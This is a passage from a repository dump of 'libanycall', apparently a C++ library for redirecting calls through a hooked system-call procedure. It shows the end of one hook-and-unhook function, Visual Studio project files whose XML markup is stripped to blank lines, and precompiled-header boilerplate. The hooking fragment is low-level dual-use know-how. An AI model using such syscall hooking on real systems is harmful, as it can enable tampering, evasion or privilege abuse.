87 | reinterpret_cast< FnType >( syscall_handler )( augments ... );
88 |
89 | libanycall::unhook( procedure, true );
90 |
91 | return invoke_result;
92 | }
93 |
94 | libanycall::unhook( procedure, true );
95 | }
96 | } // namespace libanycall
--------------------------------------------------------------------------------
/libanycall/libanycall.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {4c9429ae-eac9-473e-b8e0-0ada1a2a7ddf}
25 | libanycall
26 | 10.0
27 |
28 |
29 |
30 | StaticLibrary
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | StaticLibrary
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | StaticLibrary
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | StaticLibrary
50 | false
51 | v142
52 | true
53 | MultiByte
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | true
76 |
77 |
78 | false
79 |
80 |
81 | true
82 |
83 |
84 | false
85 | $(ProjectName)64
86 |
87 |
88 |
89 | Level3
90 | true
91 | WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)
92 | true
93 | Use
94 | pch.h
95 |
96 |
97 |
98 |
99 | true
100 |
101 |
102 |
103 |
104 | Level3
105 | true
106 | true
107 | true
108 | WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)
109 | true
110 | Use
111 | pch.h
112 |
113 |
114 |
115 |
116 | true
117 | true
118 | true
119 |
120 |
121 |
122 |
123 | Level3
124 | true
125 | _DEBUG;_LIB;%(PreprocessorDefinitions)
126 | true
127 | Use
128 | pch.h
129 |
130 |
131 |
132 |
133 | true
134 |
135 |
136 |
137 |
138 | Level3
139 | true
140 | true
141 | true
142 | NDEBUG;_LIB;%(PreprocessorDefinitions)
143 | true
144 | Use
145 | pch.h
146 | stdcpp17
147 |
148 |
149 |
150 |
151 | true
152 | true
153 | true
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 | Create
165 | Create
166 | Create
167 | Create
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
--------------------------------------------------------------------------------
/libanycall/libanycall.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
37 |
38 | Source Files
39 |
40 |
41 |
--------------------------------------------------------------------------------
/libanycall/pch.cpp:
--------------------------------------------------------------------------------
1 | // pch.cpp: source file corresponding to the pre-compiled header
2 |
3 | #include "pch.h"
4 |
5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed.
6 |
--------------------------------------------------------------------------------
/libanycall/pch.h:
--------------------------------------------------------------------------------
1 | // pch.h: This is a precompiled header file.
2 | // Files listed below are compiled only once, improving build performance for future builds.
3 | // This also affects IntelliSense performance, including code completion and many code browsing features.
4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds.
5 | // Do not add files here that you will be updating frequently as this negates the performance advantage.
6 |
7 | #ifndef PCH_H
8 | #define PCH_H
9 |
10 | // add headers that you want to pre-compile here
11 | #include "framework.h"
12 |
13 | #endif //PCH_H
14 |
--------------------------------------------------------------------------------